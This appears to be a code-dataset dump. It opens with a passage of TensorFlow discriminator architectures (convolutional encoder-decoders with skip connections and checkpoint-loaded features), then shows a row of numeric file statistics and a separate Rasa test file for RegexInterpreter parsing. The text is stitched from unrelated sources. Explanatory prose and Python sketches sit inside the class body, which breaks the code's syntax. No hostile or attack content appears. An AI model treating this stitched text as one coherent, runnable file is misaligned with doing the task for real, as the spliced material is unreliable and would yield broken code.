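    # VALID convolution, stride 1: output = input - k + 1
    return size - k + 1

def valid_pool(size, k=2, s=2):
    # VALID pooling: output = floor((input - k) / s) + 1
    return (size - k) // s + 1

def arch13_spatial(h, bp=11):
    h = h + 2 * bp          # reflect padding on both sides
    h = valid_conv(h, 3)    # s_h0_conv
    h = valid_conv(h, 3)    # s_h1_conv
    h = valid_pool(h)       # s_pool1
    h = valid_conv(h, 3)    # s_h2_conv
    h = valid_conv(h, 3)    # s_h3_conv
    h = valid_pool(h)       # s_pool2
    h = valid_conv(h, 3)    # s_h4_conv
    return h

print(arch13_spatial(32))  # -> 8, a quarter of the 32-pixel input, matching the comments
```

The same bookkeeping explains the smaller pads in the residual variants: `arch7` loses 2 + 4 pixels to its 3x3 and 5x5 VALID convolutions (pad 3 per side), and `arch8` loses 14 + 2 to its 15x15 and 3x3 convolutions (pad 8 per side).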
    def arch14(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            bp = 11
            h = tf.pad(h, [[0, 0], [bp, bp], [bp, bp], [0, 0]], "REFLECT")
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv', pad="VALID_NOPAD"))
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv', pad="VALID_NOPAD"))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1', padding='VALID')
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv', pad="VALID_NOPAD"))
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv', pad="VALID_NOPAD"))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2', padding='VALID')
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv', pad="VALID_NOPAD"))
            h4 = conv2d(h4, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h5_conv')
            out = tf.image.resize_images(h4, [tf.shape(image)[1], tf.shape(image)[2]])
            return tf.nn.sigmoid(out), out, params['entropy']
    archs['arch14'] = arch14
    def arch15(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            # 32x32x6
            h = (image+1)/2
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
            h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
            h6 = lrelu(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'))
            # 8x8x128
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim*2])
            dh2 = lrelu(deconv2d(h6, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim*2))
            # 16x16x64
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch15'] = arch15
    def arch16(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            # 32x32x6
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            # 32x32xself.df_dim
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
            # 32x32xself.df_dim
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            # 16x16xself.df_dim
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
            # 16x16xself.df_dim*2
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
            # 16x16xself.df_dim*2
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            # 8x8xself.df_dim*2
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
            h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
            h6 = lrelu(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'))
            # 8x8xself.df_dim*4
            pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool3')  # name fixed: original reused 's_pool2'
            # 4x4xself.df_dim*4
            h7 = lrelu(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'))
            # 4x4x256
            dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
            dh1 = lrelu(deconv2d(h7, output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2))
            dh1 = tf.concat([dh1, pool2], 3)
            # 8x8x128 x2
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
            dh2 = lrelu(deconv2d(dh1, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
            dh2 = tf.concat([dh2, pool1], 3)
            # 16x16x64 x2
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch16'] = arch16
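`arch16` repeats `arch12`'s encoder-decoder but adds skip connections: each deconvolution output is concatenated channel-wise (`tf.concat(..., 3)`) with the pooled encoder feature map at the same resolution, U-Net style, so the following layer sees both coarse and fine features. A small pure-Python sketch of the resulting channel counts (the variable names are bookkeeping only, not the original ops):

```python
def arch16_decoder_channels(df_dim=64):
    # Encoder features kept for the skips (channel count at each resolution):
    pool1 = df_dim          # H/2 x W/2
    pool2 = df_dim * 2      # H/4 x W/4
    # Decoder:
    dh1 = df_dim * 2        # deconv from the 4x4 bottleneck
    dh1_cat = dh1 + pool2   # concat along channel axis 3
    dh2 = df_dim            # next deconv
    dh2_cat = dh2 + pool1   # second skip concat
    return dh1_cat, dh2_cat  # channels feeding s_dh2 and s_dh3

print(arch16_decoder_channels())  # -> (256, 128) with the default df_dim=64
```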
    def arch17(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            # 32x32x6
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            # 32x32xself.df_dim
            h1 = lrelu(instance_norm(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'), scope="s_h1_IN"))
            # 32x32xself.df_dim
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            # 16x16xself.df_dim
            h2 = lrelu(instance_norm(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'), scope="s_h2_IN"))
            # 16x16xself.df_dim*2
            h3 = lrelu(instance_norm(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'), scope="s_h3_IN"))
            # 16x16xself.df_dim*2
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            # 8x8xself.df_dim*2
            h4 = lrelu(instance_norm(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'), scope="s_h4_IN"))
            h5 = lrelu(instance_norm(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'), scope="s_h5_IN"))
            h6 = lrelu(instance_norm(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'), scope="s_h6_IN"))
            # 8x8xself.df_dim*4
            pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool3')  # name fixed: original reused 's_pool2'
            # 4x4xself.df_dim*4
            h7 = lrelu(instance_norm(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'), scope="s_h7_IN"))
            # 4x4x256
            dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
            dh1 = lrelu(instance_norm(deconv2d(h7, output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2), scope="s_dh1_IN"))
            dh1 = tf.concat([dh1, pool2], 3)
            # 8x8x128 x2
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
            dh2 = lrelu(instance_norm(deconv2d(dh1, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim), scope="s_dh2_IN"))
            dh2 = tf.concat([dh2, pool1], 3)
            # 16x16x64 x2
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch17'] = arch17
    def arch18(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            # 32x32x6
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            # 32x32xself.df_dim
            h1 = lrelu(instance_norm(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'), scope="s_h1_IN"))
            # 32x32xself.df_dim
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            # 16x16xself.df_dim
            h2 = lrelu(instance_norm(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'), scope="s_h2_IN"))
            # 16x16xself.df_dim*2
            h3 = lrelu(instance_norm(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'), scope="s_h3_IN"))
            # 16x16xself.df_dim*2
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            # 8x8xself.df_dim*2
            h4 = lrelu(instance_norm(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'), scope="s_h4_IN"))
            h5 = lrelu(instance_norm(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'), scope="s_h5_IN"))
            h6 = lrelu(instance_norm(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'), scope="s_h6_IN"))
            # 8x8xself.df_dim*4
            pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool3')  # name fixed: original reused 's_pool2'
            # 4x4xself.df_dim*4
            h7 = lrelu(instance_norm(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'), scope="s_h7_IN"))
            # 4x4x256
            dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
            dh1 = lrelu(instance_norm(tf.nn.dropout(deconv2d(h7, output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2), 0.5), scope="s_dh1_IN"))
            dh1 = tf.concat([dh1, pool2], 3)
            # 8x8x128 x2
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
            dh2 = lrelu(instance_norm(deconv2d(dh1, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim), scope="s_dh2_IN"))
            dh2 = tf.concat([dh2, pool1], 3)
            # 16x16x64 x2
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch18'] = arch18
    def arch19(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = (image+1)/2
            # 32x32x6
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
            h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
            # 8x8x128
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
            dh2 = lrelu(deconv2d(h5, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
            # 16x16x64
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh2 = tf.concat([dh2, h3], 3)
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch19'] = arch19
    def arch20(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            # 32x32x2
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            # 32x32xself.df_dim
            pool1 = max_pooling2d(h0, [3, 3], [2, 2], name='s_pool1', padding='same')
            # 16x16xself.df_dim
            h1 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
            # 16x16xself.df_dim*2
            pool2 = max_pooling2d(h1, [3, 3], [2, 2], name='s_pool2', padding='same')
            # 8x8xself.df_dim*2
            h2 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
            # 8x8xself.df_dim*4
            pool3 = max_pooling2d(h2, [3, 3], [2, 2], name='s_pool3', padding='same')
            # 4x4xself.df_dim*4
            dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
            dh1 = lrelu(deconv2d(pool3, output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2))
            # 8x8xself.df_dim*2
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
            dh1 = tf.concat([dh1, pool2], 3)
            dh2 = lrelu(deconv2d(dh1, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
            # 16x16x64
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh2 = tf.concat([dh2, pool1], 3)
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch20'] = arch20
    # def feat1(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
    #     with tf.variable_scope("discriminator") as scope:
    #
    #         input = tf.concat([params['sem_seg'], image], 3)
    #
    #         h0 = lrelu(conv2d(input, self.df_dim, name='d_h0_conv'))
    #         # h0 is (128 x 128 x self.df_dim)
    #         h1 = lrelu(instance_norm(conv2d(h0, self.df_dim*2, name='d_h1_conv'), scope="d_h1_IN"))
    #         # h1 is (64 x 64 x self.df_dim*2)
    #         h2 = lrelu(instance_norm(conv2d(h1, self.df_dim*4, name='d_h2_conv'), scope="d_h2_IN"))
    #         # h2 is (32 x 32 x self.df_dim*4)
    #
    #         return tf.nn.sigmoid(h2), h2, params['entropy']
    #
    # archs['feat1'] = feat1
    def feat1(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            inputs = tf.concat([params['sem_seg'], image], 3)  # renamed from `input` to avoid shadowing the builtin
            h0 = lrelu(conv2d_from_tensors(inputs, self.conv_dict['w0'], self.conv_dict['b0']))
            # h0 is (128 x 128 x self.df_dim)
            h1 = lrelu(instance_norm(conv2d_from_tensors(h0, self.conv_dict['w1'], self.conv_dict['b1']), scope="s_h1_IN"))
            # h1 is (64 x 64 x self.df_dim*2)
            h2 = lrelu(instance_norm(conv2d_from_tensors(h1, self.conv_dict['w2'], self.conv_dict['b2']), scope="s_h2_IN"))
            # h2 is (32 x 32 x self.df_dim*4)
            return tf.nn.sigmoid(h2), h2, params['entropy']
    archs['feat1'] = feat1
    def feat1A(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            inputs = tf.concat([params['sem_seg'], image], 3)  # renamed from `input` to avoid shadowing the builtin
            h0 = lrelu(conv2d_from_tensors(inputs, self.conv_dict['w0'], self.conv_dict['b0']))
            # h0 is (128 x 128 x self.df_dim)
            h1 = lrelu(instance_norm_from_tensors(conv2d_from_tensors(h0, self.conv_dict['w1'], self.conv_dict['b1']), scale=self.conv_dict['s1'], offset=self.conv_dict['o1']))
            # h1 is (64 x 64 x self.df_dim*2)
            h2 = lrelu(instance_norm_from_tensors(conv2d_from_tensors(h1, self.conv_dict['w2'], self.conv_dict['b2']), scale=self.conv_dict['s2'], offset=self.conv_dict['o2']))
            # h2 is (32 x 32 x self.df_dim*4)
            return tf.nn.sigmoid(h2), h2, params['entropy']
    archs['feat1A'] = feat1A
    def feat2(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            # image = tf.concat([image, params['sem_seg']], 3)
            h = ((image+1)/2)*0.79375
            bp = 11
            h = tf.pad(h, [[0, 0], [bp, bp], [bp, bp], [0, 0]], "REFLECT")
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv', pad="VALID_NOPAD"))
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv', pad="VALID_NOPAD"))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1', padding='VALID')
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv', pad="VALID_NOPAD"))
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv', pad="VALID_NOPAD"))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2', padding='VALID')
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv', pad="VALID_NOPAD"))
            # 8x8x256
            return tf.nn.sigmoid(h4), h4, params['entropy']
    archs['feat2'] = feat2
    def __init__(self, df_dim=64, batch_momentum=0.9, arch='arch1', archs=archs, ckpt=None):
        """
        Args:
            df_dim: Number of filters in the first layer. Doubled with each following layer.
            batch_momentum: Momentum parameter for batch normalization.
            arch: Name of the architecture to be used (a key of `archs`).
            archs: Registry mapping architecture names to the methods above.
            ckpt: Checkpoint directory holding a pretrained discriminator graph;
                required by the 'feat1' and 'feat1A' architectures.
        """
        self.df_dim = df_dim
        self.batch_momentum = batch_momentum
        self.arch = arch
        self.archs = archs
        self.ckpt = ckpt
        self.conv_dict = {}
        # Parenthesized explicitly: the original `a and b or c` condition let
        # 'feat1A' fall through to the checkpoint-loading branch even when no
        # checkpoint directory was given.
        if self.ckpt is not None and self.arch in ('feat1', 'feat1A'):
            checkpoint = tf.train.latest_checkpoint(self.ckpt)
            path_to_meta = glob(os.path.join(self.ckpt, '*.meta'))
            self.saver = tf.train.import_meta_graph(path_to_meta[0])
            gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.9)
            self.sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
            self.saver.restore(self.sess, checkpoint)
            self.graph = self.sess.graph
            self.conv_dict['w0'] = self.graph.get_tensor_by_name('discriminator/d_h0_conv/w:0')
            self.conv_dict['w1'] = self.graph.get_tensor_by_name('discriminator/d_h1_conv/w:0')
            self.conv_dict['w2'] = self.graph.get_tensor_by_name('discriminator/d_h2_conv/w:0')
            self.conv_dict['b0'] = self.graph.get_tensor_by_name('discriminator/d_h0_conv/biases:0')
            self.conv_dict['b1'] = self.graph.get_tensor_by_name('discriminator/d_h1_conv/biases:0')
            self.conv_dict['b2'] = self.graph.get_tensor_by_name('discriminator/d_h2_conv/biases:0')
            self.conv_dict['s1'] = self.graph.get_tensor_by_name('discriminator/d_h1_IN/scale:0')
            self.conv_dict['s2'] = self.graph.get_tensor_by_name('discriminator/d_h2_IN/scale:0')
            self.conv_dict['o1'] = self.graph.get_tensor_by_name('discriminator/d_h1_IN/offset:0')
            self.conv_dict['o2'] = self.graph.get_tensor_by_name('discriminator/d_h2_IN/offset:0')
            # print(tf.get_default_graph().get_all_collection_keys())
            # self.df_dim = self.graph.get_tensor_by_name('discriminator/d_h0_conv/w:0').shape[-1]
    def get_output(self, image, reuse=False, is_training=True, bn=False, bs=64, image_semSeg=None):
        params = {'activation': tf.nn.relu, 'padding': 'same',
                  'batch_normalization': bn, 'entropy': 'sigmoid', 'batch_size': bs,
                  'sem_seg': image_semSeg}
        return self.archs[self.arch](self, image, reuse=reuse, is_training=is_training, params=params)
| 53.952941 | 176 | 0.581286 | 7,076 | 41,274 | 3.153477 | 0.041266 | 0.039437 | 0.053643 | 0.016671 | 0.842744 | 0.826925 | 0.808551 | 0.804159 | 0.792955 | 0.783544 | 0 | 0.084154 | 0.254325 | 41,274 | 764 | 177 | 54.02356 | 0.640868 | 0.077894 | 0 | 0.635838 | 0 | 0.001927 | 0.079856 | 0.007767 | 0 | 0 | 0 | 0 | 0.044316 | 1 | 0.063584 | false | 0 | 0.013487 | 0.00578 | 0.142582 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
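The `archs['...'] = arch` assignment that follows each definition builds a class-level registry, and `get_output` dispatches through it by looking up the function in the dict and passing `self` explicitly. A minimal, self-contained sketch of that pattern (the class and architecture names here are illustrative, not taken from the original file):

```python
class Discriminator:
    # Class-level registry, populated inside the class body, mirroring
    # the `archs['archN'] = archN` lines after each method above.
    archs = {}

    def arch_a(self, image, params):
        return ("arch_a", image, params['entropy'])
    archs['arch_a'] = arch_a

    def arch_b(self, image, params):
        return ("arch_b", image, params['entropy'])
    archs['arch_b'] = arch_b

    def __init__(self, arch='arch_a'):
        self.arch = arch

    def get_output(self, image, bs=64):
        params = {'entropy': 'sigmoid', 'batch_size': bs}
        # Dict lookup returns the plain function (no bound-method binding),
        # so `self` is passed explicitly, as in `self.archs[self.arch](self, ...)`.
        return self.archs[self.arch](self, image, params)

print(Discriminator('arch_b').get_output("img"))  # -> ('arch_b', 'img', 'sigmoid')
```

A design consequence of this pattern: because the functions are stored in a plain dict rather than looked up as attributes, selecting an architecture is a string key at construction time, and adding one requires only a new method plus one registry line.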
dc7665eddfb7f1b8b555782fe341b8569a52f730 | 2,801 | py | Python | tests/shared/nlu/test_interpreter.py | praneethgb/rasa | 5bf227f165d0b041a367d2c0bbf712ebb6a54792 | [
"Apache-2.0"
] | 37 | 2019-06-07T07:39:00.000Z | 2022-01-27T08:32:57.000Z | tests/shared/nlu/test_interpreter.py | praneethgb/rasa | 5bf227f165d0b041a367d2c0bbf712ebb6a54792 | [
"Apache-2.0"
] | 216 | 2020-09-20T13:05:58.000Z | 2022-03-28T12:10:24.000Z | tests/shared/nlu/test_interpreter.py | praneethgb/rasa | 5bf227f165d0b041a367d2c0bbf712ebb6a54792 | [
"Apache-2.0"
] | 65 | 2019-05-21T12:16:53.000Z | 2022-02-23T10:54:15.000Z | import pytest
from rasa.shared.constants import INTENT_MESSAGE_PREFIX
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.shared.nlu.interpreter import RegexInterpreter

async def test_regex_interpreter_intent():
    text = INTENT_MESSAGE_PREFIX + "my_intent"
    result = await RegexInterpreter().parse(text)
    assert result["text"] == text
    assert len(result["intent_ranking"]) == 1
    assert (
        result["intent"][INTENT_NAME_KEY]
        == result["intent_ranking"][0][INTENT_NAME_KEY]
        == "my_intent"
    )
    assert (
        result["intent"]["confidence"]
        == result["intent_ranking"][0]["confidence"]
        == pytest.approx(1.0)
    )
    assert len(result["entities"]) == 0


async def test_regex_interpreter_entities():
    text = INTENT_MESSAGE_PREFIX + 'my_intent{"foo":"bar"}'
    result = await RegexInterpreter().parse(text)
    assert result["text"] == text
    assert len(result["intent_ranking"]) == 1
    assert (
        result["intent"][INTENT_NAME_KEY]
        == result["intent_ranking"][0][INTENT_NAME_KEY]
        == "my_intent"
    )
    assert (
        result["intent"]["confidence"]
        == result["intent_ranking"][0]["confidence"]
        == pytest.approx(1.0)
    )
    assert len(result["entities"]) == 1
    assert result["entities"][0]["entity"] == "foo"
    assert result["entities"][0]["value"] == "bar"


async def test_regex_interpreter_confidence():
    text = INTENT_MESSAGE_PREFIX + "my_intent@0.5"
    result = await RegexInterpreter().parse(text)
    assert result["text"] == text
    assert len(result["intent_ranking"]) == 1
    assert (
        result["intent"][INTENT_NAME_KEY]
        == result["intent_ranking"][0][INTENT_NAME_KEY]
        == "my_intent"
    )
    assert (
        result["intent"]["confidence"]
        == result["intent_ranking"][0]["confidence"]
        == pytest.approx(0.5)
    )
    assert len(result["entities"]) == 0


async def test_regex_interpreter_confidence_and_entities():
    text = INTENT_MESSAGE_PREFIX + 'my_intent@0.5{"foo":"bar"}'
    result = await RegexInterpreter().parse(text)
    assert result["text"] == text
    assert len(result["intent_ranking"]) == 1
    assert (
        result["intent"][INTENT_NAME_KEY]
        == result["intent_ranking"][0][INTENT_NAME_KEY]
        == "my_intent"
    )
    assert (
        result["intent"]["confidence"]
        == result["intent_ranking"][0]["confidence"]
        == pytest.approx(0.5)
    )
    assert len(result["entities"]) == 1
    assert result["entities"][0]["entity"] == "foo"
    assert result["entities"][0]["value"] == "bar"


async def test_regex_interpreter_adds_intent_prefix():
    r = await RegexInterpreter().parse('mood_greet{"name": "rasa"}')
    assert r.get("text") == '/mood_greet{"name": "rasa"}'
